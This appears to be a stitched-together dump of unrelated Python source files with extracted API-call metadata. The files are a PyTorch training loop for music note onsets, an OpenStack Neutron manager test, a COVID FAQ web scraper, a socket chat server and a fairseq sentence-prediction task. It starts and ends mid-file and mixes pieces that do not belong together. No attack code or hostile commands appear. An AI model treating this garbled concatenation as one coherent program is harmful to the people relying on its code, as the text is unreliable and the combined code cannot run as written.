onset_loss = criterion_onset(output1, torch.narrow(target, dim=2, start=0, length=2))
pitch_loss = criterion_pitch(output2, torch.narrow(target, dim=2, start=2, length=1))
total_loss = onset_loss + pitch_loss
valid_loss = valid_loss + total_loss.item()
total_length += 1
valid_loss /= total_length
valid_loss_list.append(valid_loss)
print(f'valid_loss: {valid_loss:.4f}\n')
scheduler.step(valid_loss)
if valid_loss < best_loss:
best_loss = valid_loss
best_training_loss = training_loss
best_model_params = copy.deepcopy(model.state_dict())
if (epoch + 1) % 50 == 0:
model.load_state_dict(best_model_params)
weight_path = Path(opt.checkpoint_dir).joinpath(
f'model-{epoch + 1}epoch-{best_loss:.02f}-best_valid_loss.pth')
torch.save(model, str(weight_path))
record.write(f'{epoch + 1}\n')
record.write(f'Best training loss: {best_training_loss:.4f}\n')
record.write(f'Best valid loss: {best_loss:.4f}\n')
print(f'Best training loss: {best_training_loss:.4f}')
print(f'Best valid loss: {best_loss:.4f}')
model.load_state_dict(best_model_params)
weight_path = Path(opt.checkpoint_dir).joinpath(f'model-{best_loss:.02f}-best_valid_loss.pth')
torch.save(model, str(weight_path))
visualization(training_loss_list, valid_loss_list)
return model
if __name__ == '__main__':
THE_FOLDER = opt.data_root
data_seq = []
label = []
for the_dir in os.listdir(THE_FOLDER):
json_path = Path(THE_FOLDER).joinpath(the_dir).joinpath(the_dir+'_feature.json')
gt_path = Path(THE_FOLDER).joinpath(the_dir).joinpath(the_dir+'_groundtruth.txt')
youtube_link_path = Path(THE_FOLDER).joinpath(the_dir).joinpath(the_dir+'_link.txt')
with open(json_path,'r') as json_file:
temp = json.loads(json_file.read())
data = []
for key, value in temp.items():
data.append(value)
#print(key)
data = np.array(data).T
data_seq.append(data)
gtdata = np.loadtxt(gt_path)
label.append(gtdata)
label=preprocess(data_seq,label)
model = train()
|
[
"tqdm.tqdm",
"torch.narrow",
"dataset.NoteDataset",
"torch.nn.BCEWithLogitsLoss",
"torch.optim.lr_scheduler.ReduceLROnPlateau",
"torch.FloatTensor",
"model.NeuralNetWithRNN",
"pathlib.Path",
"dataset.get_loader",
"numpy.array",
"numpy.loadtxt",
"torch.nn.SmoothL1Loss",
"visual.visualization",
"os.listdir"
] |
[((1566, 1594), 'dataset.NoteDataset', 'NoteDataset', (['data_seq', 'label'], {}), '(data_seq, label)\n', (1577, 1594), False, 'from dataset import NoteDataset, get_loader\n'), ((1628, 1648), 'dataset.get_loader', 'get_loader', (['data_set'], {}), '(data_set)\n', (1638, 1648), False, 'from dataset import NoteDataset, get_loader\n'), ((1828, 1877), 'model.NeuralNetWithRNN', 'NeuralNetWithRNN', (['opt.input_dim', '[34, 51, 34, 17]'], {}), '(opt.input_dim, [34, 51, 34, 17])\n', (1844, 1877), False, 'from model import Rnn, BiRNN, NeuralNet, NeuralNetWithRNN\n'), ((2079, 2101), 'torch.nn.BCEWithLogitsLoss', 'nn.BCEWithLogitsLoss', ([], {}), '()\n', (2099, 2101), True, 'import torch.nn as nn\n'), ((2124, 2141), 'torch.nn.SmoothL1Loss', 'nn.SmoothL1Loss', ([], {}), '()\n', (2139, 2141), True, 'import torch.nn as nn\n'), ((2222, 2319), 'torch.optim.lr_scheduler.ReduceLROnPlateau', 'ReduceLROnPlateau', (['optimizer'], {'mode': '"""min"""', 'factor': '(0.5)', 'patience': '(2)', 'verbose': '(True)', 'min_lr': '(1e-08)'}), "(optimizer, mode='min', factor=0.5, patience=2, verbose=\n True, min_lr=1e-08)\n", (2239, 2319), False, 'from torch.optim.lr_scheduler import ReduceLROnPlateau\n'), ((5786, 5836), 'visual.visualization', 'visualization', (['training_loss_list', 'valid_loss_list'], {}), '(training_loss_list, valid_loss_list)\n', (5799, 5836), False, 'from visual import visualization\n'), ((5969, 5991), 'os.listdir', 'os.listdir', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (5979, 5991), False, 'import os\n'), ((6556, 6575), 'numpy.loadtxt', 'np.loadtxt', (['gt_path'], {}), '(gt_path)\n', (6566, 6575), True, 'import numpy as np\n'), ((2650, 2668), 'tqdm.tqdm', 'tqdm', (['train_loader'], {}), '(train_loader)\n', (2654, 2668), False, 'from tqdm import tqdm\n'), ((2728, 2753), 'torch.FloatTensor', 'torch.FloatTensor', (['inputs'], {}), '(inputs)\n', (2745, 2753), False, 'import torch\n'), ((2909, 2934), 'torch.FloatTensor', 'torch.FloatTensor', (['target'], {}), '(target)\n', (2926, 2934), False, 'import torch\n'), ((3813, 3831), 'tqdm.tqdm', 'tqdm', (['valid_loader'], {}), '(valid_loader)\n', (3817, 3831), False, 'from tqdm import tqdm\n'), ((3891, 3916), 'torch.FloatTensor', 'torch.FloatTensor', (['inputs'], {}), '(inputs)\n', (3908, 3916), False, 'import torch\n'), ((4072, 4097), 'torch.FloatTensor', 'torch.FloatTensor', (['target'], {}), '(target)\n', (4089, 4097), False, 'import torch\n'), ((5661, 5685), 'pathlib.Path', 'Path', (['opt.checkpoint_dir'], {}), '(opt.checkpoint_dir)\n', (5665, 5685), False, 'from pathlib import Path\n'), ((6491, 6505), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (6499, 6505), True, 'import numpy as np\n'), ((3213, 3259), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(0)', 'length': '(2)'}), '(target, dim=2, start=0, length=2)\n', (3225, 3259), False, 'import torch\n'), ((3311, 3357), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(2)', 'length': '(1)'}), '(target, dim=2, start=2, length=1)\n', (3323, 3357), False, 'import torch\n'), ((4376, 4422), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(0)', 'length': '(2)'}), '(target, dim=2, start=0, length=2)\n', (4388, 4422), False, 'import torch\n'), ((4474, 4520), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(2)', 'length': '(1)'}), '(target, dim=2, start=2, length=1)\n', (4486, 4520), False, 'import torch\n'), ((809, 841), 'numpy.array', 'np.array', (['[1, 0, cur_note_pitch]'], {}), '([1, 0, cur_note_pitch])\n', (817, 841), True, 'import numpy as np\n'), ((5144, 5168), 'pathlib.Path', 'Path', (['opt.checkpoint_dir'], {}), '(opt.checkpoint_dir)\n', (5148, 5168), False, 'from pathlib import Path\n'), ((957, 978), 'numpy.array', 'np.array', (['[0, 0, 0.0]'], {}), '([0, 0, 0.0])\n', (965, 978), True, 'import numpy as np\n'), ((6013, 6029), 'pathlib.Path', 'Path', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (6017, 6029), False, 'from pathlib import Path\n'), ((6100, 6116), 'pathlib.Path', 'Path', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (6104, 6116), False, 'from pathlib import Path\n'), ((6200, 6216), 'pathlib.Path', 'Path', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (6204, 6216), False, 'from pathlib import Path\n'), ((1079, 1111), 'numpy.array', 'np.array', (['[0, 1, cur_note_pitch]'], {}), '([0, 1, cur_note_pitch])\n', (1087, 1111), True, 'import numpy as np\n'), ((1435, 1467), 'numpy.array', 'np.array', (['[0, 0, cur_note_pitch]'], {}), '([0, 0, cur_note_pitch])\n', (1443, 1467), True, 'import numpy as np\n')]
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import types
import fixtures
from oslo.config import cfg
from neutron.common import config
from neutron.manager import NeutronManager
from neutron.manager import validate_post_plugin_load
from neutron.manager import validate_pre_plugin_load
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
from neutron.tests import base
from neutron.tests.unit import dummy_plugin
LOG = logging.getLogger(__name__)
DB_PLUGIN_KLASS = 'neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
ROOTDIR = os.path.dirname(os.path.dirname(__file__))
ETCDIR = os.path.join(ROOTDIR, 'etc')
def etcdir(*p):
return os.path.join(ETCDIR, *p)
class MultiServiceCorePlugin(object):
supported_extension_aliases = ['lbaas', 'dummy']
class CorePluginWithAgentNotifiers(object):
agent_notifiers = {'l3': 'l3_agent_notifier',
'dhcp': 'dhcp_agent_notifier'}
class NeutronManagerTestCase(base.BaseTestCase):
def setUp(self):
super(NeutronManagerTestCase, self).setUp()
args = ['--config-file', etcdir('neutron.conf.test')]
# If test_config specifies some config-file, use it, as well
config.parse(args=args)
NeutronManager._instance = None
self.addCleanup(cfg.CONF.reset)
self.useFixture(
fixtures.MonkeyPatch('neutron.manager.NeutronManager._instance'))
def test_service_plugin_is_loaded(self):
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
mgr = NeutronManager.get_instance()
plugin = mgr.get_service_plugins()[constants.DUMMY]
self.assertTrue(
isinstance(plugin,
(dummy_plugin.DummyServicePlugin, types.ClassType)),
"loaded plugin should be of type neutronDummyPlugin")
def test_service_plugin_by_name_is_loaded(self):
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["dummy"])
mgr = NeutronManager.get_instance()
plugin = mgr.get_service_plugins()[constants.DUMMY]
self.assertTrue(
isinstance(plugin,
(dummy_plugin.DummyServicePlugin, types.ClassType)),
"loaded plugin should be of type neutronDummyPlugin")
def test_multiple_plugins_specified_for_service_type(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin",
"neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_multiple_plugins_by_name_specified_for_service_type(self):
cfg.CONF.set_override("service_plugins", ["dummy", "dummy"])
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_multiple_plugins_mixed_specified_for_service_type(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin", "dummy"])
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_service_plugin_conflicts_with_core_plugin(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
cfg.CONF.set_override("core_plugin",
"neutron.tests.unit.test_neutron_manager."
"MultiServiceCorePlugin")
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_core_plugin_supports_services(self):
cfg.CONF.set_override("core_plugin",
"neutron.tests.unit.test_neutron_manager."
"MultiServiceCorePlugin")
mgr = NeutronManager.get_instance()
svc_plugins = mgr.get_service_plugins()
self.assertEqual(3, len(svc_plugins))
self.assertIn(constants.CORE, svc_plugins.keys())
self.assertIn(constants.LOADBALANCER, svc_plugins.keys())
self.assertIn(constants.DUMMY, svc_plugins.keys())
def test_post_plugin_validation(self):
cfg.CONF.import_opt('dhcp_agents_per_network',
'neutron.db.agentschedulers_db')
self.assertIsNone(validate_post_plugin_load())
cfg.CONF.set_override('dhcp_agents_per_network', 2)
self.assertIsNone(validate_post_plugin_load())
cfg.CONF.set_override('dhcp_agents_per_network', 0)
self.assertIsNotNone(validate_post_plugin_load())
cfg.CONF.set_override('dhcp_agents_per_network', -1)
self.assertIsNotNone(validate_post_plugin_load())
def test_pre_plugin_validation(self):
self.assertIsNotNone(validate_pre_plugin_load())
cfg.CONF.set_override('core_plugin', 'dummy.plugin')
self.assertIsNone(validate_pre_plugin_load())
def test_manager_gathers_agent_notifiers_from_service_plugins(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
cfg.CONF.set_override("core_plugin",
"neutron.tests.unit.test_neutron_manager."
"CorePluginWithAgentNotifiers")
expected = {'l3': 'l3_agent_notifier',
'dhcp': 'dhcp_agent_notifier',
'dummy': 'dummy_agent_notifier'}
core_plugin = NeutronManager.get_plugin()
self.assertEqual(expected, core_plugin.agent_notifiers)
|
[
"neutron.manager.validate_pre_plugin_load",
"oslo.config.cfg.CONF.import_opt",
"neutron.openstack.common.log.getLogger",
"oslo.config.cfg.CONF.set_override",
"fixtures.MonkeyPatch",
"os.path.dirname",
"neutron.manager.NeutronManager.get_instance",
"neutron.common.config.parse",
"neutron.manager.NeutronManager.get_plugin",
"os.path.join",
"neutron.manager.validate_post_plugin_load"
] |
[((1120, 1147), 'neutron.openstack.common.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1137, 1147), True, 'from neutron.openstack.common import log as logging\n'), ((1277, 1305), 'os.path.join', 'os.path.join', (['ROOTDIR', '"""etc"""'], {}), "(ROOTDIR, 'etc')\n", (1289, 1305), False, 'import os\n'), ((1241, 1266), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1256, 1266), False, 'import os\n'), ((1335, 1359), 'os.path.join', 'os.path.join', (['ETCDIR', '*p'], {}), '(ETCDIR, *p)\n', (1347, 1359), False, 'import os\n'), ((1867, 1890), 'neutron.common.config.parse', 'config.parse', ([], {'args': 'args'}), '(args=args)\n', (1879, 1890), False, 'from neutron.common import config\n'), ((2128, 2181), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (2149, 2181), False, 'from oslo.config import cfg\n'), ((2190, 2291), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (2211, 2291), False, 'from oslo.config import cfg\n'), ((2365, 2394), 'neutron.manager.NeutronManager.get_instance', 'NeutronManager.get_instance', ([], {}), '()\n', (2392, 2394), False, 'from neutron.manager import NeutronManager\n'), ((2716, 2769), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (2737, 2769), False, 'from oslo.config import cfg\n'), ((2778, 2829), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['dummy']"], {}), "('service_plugins', ['dummy'])\n", (2799, 2829), False, 'from oslo.config import cfg\n'), ((2844, 2873), 'neutron.manager.NeutronManager.get_instance', 'NeutronManager.get_instance', ([], {}), '()\n', (2871, 2873), False, 'from neutron.manager import NeutronManager\n'), ((3206, 3365), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin',\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin',\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (3227, 3365), False, 'from oslo.config import cfg\n'), ((3494, 3547), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (3515, 3547), False, 'from oslo.config import cfg\n'), ((3696, 3756), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['dummy', 'dummy']"], {}), "('service_plugins', ['dummy', 'dummy'])\n", (3717, 3756), False, 'from oslo.config import cfg\n'), ((3765, 3818), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (3786, 3818), False, 'from oslo.config import cfg\n'), ((3965, 4075), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin', 'dummy']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin', 'dummy'])\n", (3986, 4075), False, 'from oslo.config import cfg\n'), ((4143, 4196), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (4164, 4196), False, 'from oslo.config import cfg\n'), ((4335, 4436), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (4356, 4436), False, 'from oslo.config import cfg\n'), ((4504, 4610), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin"""'], {}), "('core_plugin',\n 'neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin')\n", (4525, 4610), False, 'from oslo.config import cfg\n'), ((4796, 4902), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin"""'], {}), "('core_plugin',\n 'neutron.tests.unit.test_neutron_manager.MultiServiceCorePlugin')\n", (4817, 4902), False, 'from oslo.config import cfg\n'), ((4976, 5005), 'neutron.manager.NeutronManager.get_instance', 'NeutronManager.get_instance', ([], {}), '()\n', (5003, 5005), False, 'from neutron.manager import NeutronManager\n'), ((5335, 5414), 'oslo.config.cfg.CONF.import_opt', 'cfg.CONF.import_opt', (['"""dhcp_agents_per_network"""', '"""neutron.db.agentschedulers_db"""'], {}), "('dhcp_agents_per_network', 'neutron.db.agentschedulers_db')\n", (5354, 5414), False, 'from oslo.config import cfg\n'), ((5507, 5558), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""dhcp_agents_per_network"""', '(2)'], {}), "('dhcp_agents_per_network', 2)\n", (5528, 5558), False, 'from oslo.config import cfg\n'), ((5622, 5673), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""dhcp_agents_per_network"""', '(0)'], {}), "('dhcp_agents_per_network', 0)\n", (5643, 5673), False, 'from oslo.config import cfg\n'), ((5740, 5792), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""dhcp_agents_per_network"""', '(-1)'], {}), "('dhcp_agents_per_network', -1)\n", (5761, 5792), False, 'from oslo.config import cfg\n'), ((5959, 6011), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""dummy.plugin"""'], {}), "('core_plugin', 'dummy.plugin')\n", (5980, 6011), False, 'from oslo.config import cfg\n'), ((6148, 6249), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (6169, 6249), False, 'from oslo.config import cfg\n'), ((6317, 6429), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', '"""neutron.tests.unit.test_neutron_manager.CorePluginWithAgentNotifiers"""'], {}), "('core_plugin',\n 'neutron.tests.unit.test_neutron_manager.CorePluginWithAgentNotifiers')\n", (6338, 6429), False, 'from oslo.config import cfg\n'), ((6662, 6689), 'neutron.manager.NeutronManager.get_plugin', 'NeutronManager.get_plugin', ([], {}), '()\n', (6687, 6689), False, 'from neutron.manager import NeutronManager\n'), ((2008, 2072), 'fixtures.MonkeyPatch', 'fixtures.MonkeyPatch', (['"""neutron.manager.NeutronManager._instance"""'], {}), "('neutron.manager.NeutronManager._instance')\n", (2028, 2072), False, 'import fixtures\n'), ((5470, 5497), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5495, 5497), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5585, 5612), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5610, 5612), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5703, 5730), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5728, 5730), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5822, 5849), 'neutron.manager.validate_post_plugin_load', 'validate_post_plugin_load', ([], {}), '()\n', (5847, 5849), False, 'from neutron.manager import validate_post_plugin_load\n'), ((5923, 5949), 'neutron.manager.validate_pre_plugin_load', 'validate_pre_plugin_load', ([], {}), '()\n', (5947, 5949), False, 'from neutron.manager import validate_pre_plugin_load\n'), ((6038, 6064), 'neutron.manager.validate_pre_plugin_load', 'validate_pre_plugin_load', ([], {}), '()\n', (6062, 6064), False, 'from neutron.manager import validate_pre_plugin_load\n')]
|
# Copyright (c) Johns Hopkins University and its affiliates.
# This source code is licensed under the Apache 2 license found in the
# LICENSE file in the root directory of this source tree.
"""
JHU Medicine crawler
Expected page to crawl is
https://www.hopkinsmedicine.org/health/conditions-and-diseases/coronavirus/coronavirus-frequently-asked-questions
"""
__author__ = "<NAME>"
__copyright__ = "Copyright 2020, Johns Hopkins University"
__credits__ = ["<NAME>"]
__license__ = "Apache 2.0"
__version__ = "0.1"
__maintainer__ = "JHU-COVID-QA"
__email__ = "<EMAIL>"
__status__ = "Development"
import datetime
import time
import dateparser
import requests
import copy
from bs4 import BeautifulSoup
from covid_scraping import Conversion, Scraper
class JHUMedicineScraper(Scraper):
def scrape(self):
url = "https://www.hopkinsmedicine.org/health/conditions-and-diseases/coronavirus/coronavirus-frequently-asked-questions"
html = requests.get(url).text
soup = BeautifulSoup(html, 'lxml').find_all('div', {'class': 'rtf'})
lastUpdateTime = time.mktime(
dateparser.parse(
soup[-1].getText().strip()[7:])
.timetuple())
final_questions = []
final_responces = []
for section in soup:
questions = section.find_all('h3')
for question in questions:
final_questions.append(question.get_text(strip=False))
soup_iter = question
answer = ""
while soup_iter.find_next_sibling() and soup_iter.find_next_sibling().name in [
'p', 'ul']:
soup_iter = soup_iter.find_next_sibling()
answer += " " + str(soup_iter)
final_responces.append(answer)
converter = Conversion(
self._filename,
self._path)
for q, a in zip(final_questions, final_responces):
converter.addExample({
'sourceUrl': url,
'sourceName': "JHU Medicine",
"needUpdate": True,
"containsURLs": False,
"typeOfInfo": "QA",
"isAnnotated": False,
"responseAuthority": "",
"question": q,
"answer": a,
"hasAnswer": True,
"targetEducationLevel": "NA",
"topic": [],
"extraData": {},
'targetLocation': '',
'language': 'en'
})
return converter.write()
def main():
scraper = JHUMedicineScraper(path=".", filename="JHU_Medicine")
scraper.scrape()
if __name__ == '__main__':
main()
|
[
"covid_scraping.Conversion",
"requests.get",
"bs4.BeautifulSoup"
] |
[((1814, 1852), 'covid_scraping.Conversion', 'Conversion', (['self._filename', 'self._path'], {}), '(self._filename, self._path)\n', (1824, 1852), False, 'from covid_scraping import Conversion, Scraper\n'), ((950, 967), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (962, 967), False, 'import requests\n'), ((988, 1015), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html', '"""lxml"""'], {}), "(html, 'lxml')\n", (1001, 1015), False, 'from bs4 import BeautifulSoup\n')]
|
"""
Classe basique du tchat server.
"""
import socket
import select
import json
import ChatProtocole
class ChatServer:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setblocking(0)
inputs = inputs_address = outputs = []
readable = writable = exceptional = []
message_queues = ""
chat_protocol = {}
already_send = False
user_disconnect = False
def __init__(self, port=3492):
self.server.bind(('', port))
print("Serveur ON -> localhost:"+str(port))
self.server.listen(10)
self.inputs = [self.server]
self.inputs_address = [self.server.getsockname()]
self.chat_protocol = ChatProtocole.ChatProtocole()
def close_server(self):
for sock in self.chat_protocol.clients_connections:
sock.close()
def alreay_send_set(self, bool):
self.already_send = bool
def remove_from_inputs(self, server_adresse):
for i in range(1, len(self.inputs_address)):
if self.inputs_address[i] == server_adresse:
del self.inputs[i]
del self.inputs_address[i]
return i
def tuplify(self, listything):
if isinstance(listything, list): return tuple(map(self.tuplify, listything))
if isinstance(listything, dict): return {k: self.tuplify(v) for k, v in listything.items()}
return listything
def select(self):
try:
self.readable, self.writable, self.exceptional = select.select(self.inputs, self.chat_protocol.clients_connections, self.inputs)
except socket.error:
print()
def start_listen(self):
while self.inputs:
self.select()
for s in self.readable:
if s is self.server:
connection, client_address = s.accept()
print('Nouvelle connection depuis : '+str(client_address))
connection.setblocking(0)
self.chat_protocol.add_client(connection)
self.inputs.append(connection)
self.inputs_address.append(client_address)
else:
if s not in self.inputs:
pass
try:
data = s.recv(4096).decode()
except socket.error:
print("err")
if data:
data_jsonify = json.loads(data)
action = data_jsonify["action"]
content = data_jsonify["content"]
pseudo = data_jsonify["from"]
if action == "user_disconnect":
content[0] = content[0].encode('ascii', 'backslashreplace')
content = self.tuplify(content)
index = self.remove_from_inputs(content)
data_to_send = json.dumps({"action": "user_disconnect", "content": "Deconnection de "+pseudo, "from": pseudo})
if index-1 == self.chat_protocol.client_number:
self.already_send = False
self.user_disconnect = True
self.chat_protocol.send_to_all(data_to_send)
elif s.getpeername() == self.chat_protocol.get_client_speak_connection().getpeername():
data_to_send = json.dumps({"action": "message", "content": content, "from": pseudo})
self.chat_protocol.send_to_all(data_to_send)
self.already_send = False
self.chat_protocol.next_client()
if s not in self.outputs:
self.outputs.append(s)
if self.user_disconnect:
self.user_disconnect = False
pass
# Handle outputs
for s in self.writable:
if self.chat_protocol.get_client_speak_connection() is None or s is None:
break
"""
ICI :
self.chat_protocol.get_client_speak_connection().getpeername()
ne fonctionne pas quand un client par alors que cest a lui de parler .... incomprehensible
"""
try:
if not self.chat_protocol.waiting and not self.already_send and (
s.getpeername() == self.chat_protocol.get_client_speak_connection().getpeername()):
data_to_send = json.dumps({"action": "yourTurn", "content": "Cest a votre tour de parler"})
s.send(data_to_send)
self.already_send = True
except socket.error:
self.chat_protocol.next_client()
print("haha")
#Lancement du server
c = ChatServer()
c.start_listen()
|
[
"json.loads",
"socket.socket",
"json.dumps",
"select.select",
"ChatProtocole.ChatProtocole"
] |
[((135, 184), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (148, 184), False, 'import socket\n'), ((682, 711), 'ChatProtocole.ChatProtocole', 'ChatProtocole.ChatProtocole', ([], {}), '()\n', (709, 711), False, 'import ChatProtocole\n'), ((1505, 1584), 'select.select', 'select.select', (['self.inputs', 'self.chat_protocol.clients_connections', 'self.inputs'], {}), '(self.inputs, self.chat_protocol.clients_connections, self.inputs)\n', (1518, 1584), False, 'import select\n'), ((2470, 2486), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (2480, 2486), False, 'import json\n'), ((4643, 4719), 'json.dumps', 'json.dumps', (["{'action': 'yourTurn', 'content': 'Cest a votre tour de parler'}"], {}), "({'action': 'yourTurn', 'content': 'Cest a votre tour de parler'})\n", (4653, 4719), False, 'import json\n'), ((2971, 3072), 'json.dumps', 'json.dumps', (["{'action': 'user_disconnect', 'content': 'Deconnection de ' + pseudo,\n 'from': pseudo}"], {}), "({'action': 'user_disconnect', 'content': 'Deconnection de ' +\n pseudo, 'from': pseudo})\n", (2981, 3072), False, 'import json\n'), ((3489, 3558), 'json.dumps', 'json.dumps', (["{'action': 'message', 'content': content, 'from': pseudo}"], {}), "({'action': 'message', 'content': content, 'from': pseudo})\n", (3499, 3558), False, 'import json\n')]
|
import logging
import os
import numpy as np
from fairseq import utils
from fairseq import data
from fairseq.data import (
ConcatSentencesDataset,
Dictionary,
IdDataset,
NestedDictionaryDataset,
NumelDataset,
NumSamplesDataset,
OffsetTokensDataset,
PrependTokenDataset,
RawLabelDataset,
RightPadDataset,
RollDataset,
SortDataset,
StripTokenDataset,
NumberValueDataset,
data_utils,
)
from fairseq.data.shorten_dataset import maybe_shorten_dataset
from fairseq.tasks import LegacyFairseqTask, register_task
from .sentence_prediction import SentencePredictionTask
import sentencepiece as spm
logger = logging.getLogger(__name__)
@register_task("sentence_prediction_num_norm")
class SentencePredictionNumNormTask(SentencePredictionTask):
@staticmethod
def add_args(parser):
"""Add task-specific arguments to the parser."""
parser.add_argument("data", metavar="FILE", help="file prefix for data")
parser.add_argument(
"--num-classes",
type=int,
default=-1,
help="number of classes or regression targets",
)
parser.add_argument(
"--init-token",
type=int,
default=None,
help="add token at the beginning of each batch item",
)
parser.add_argument(
"--separator-token",
type=int,
default=None,
help="add separator token between inputs",
)
parser.add_argument("--regression-target", action="store_true", default=False)
parser.add_argument("--no-shuffle", action="store_true", default=False)
parser.add_argument(
"--shorten-method",
default="none",
choices=["none", "truncate", "random_crop"],
help="if not none, shorten sequences that exceed --tokens-per-sample",
)
parser.add_argument(
"--shorten-data-split-list",
default="",
help="comma-separated list of dataset splits to apply shortening to, "
'e.g., "train,valid" (default: all dataset splits)',
)
parser.add_argument(
"--add-prev-output-tokens",
action="store_true",
default=False,
help="add prev_output_tokens to sample, used for encoder-decoder arch",
)
parser.add_argument('--spm_path', type=str)
parser.add_argument('--number_value_cutoff', type=int, default=65500) # biggest number that can be passed in fp16
parser.add_argument('--send_log_value', default=False, action='store_true')
